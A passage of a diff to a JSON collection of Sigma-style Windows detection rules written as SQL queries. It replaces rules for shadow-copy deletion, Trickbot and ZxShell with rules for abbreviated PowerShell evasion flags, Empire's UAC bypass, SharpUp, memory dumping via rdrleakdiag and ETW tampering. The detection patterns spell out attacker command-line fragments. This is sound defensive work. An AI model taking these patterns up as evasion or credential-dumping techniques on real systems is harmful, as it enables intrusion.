PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE 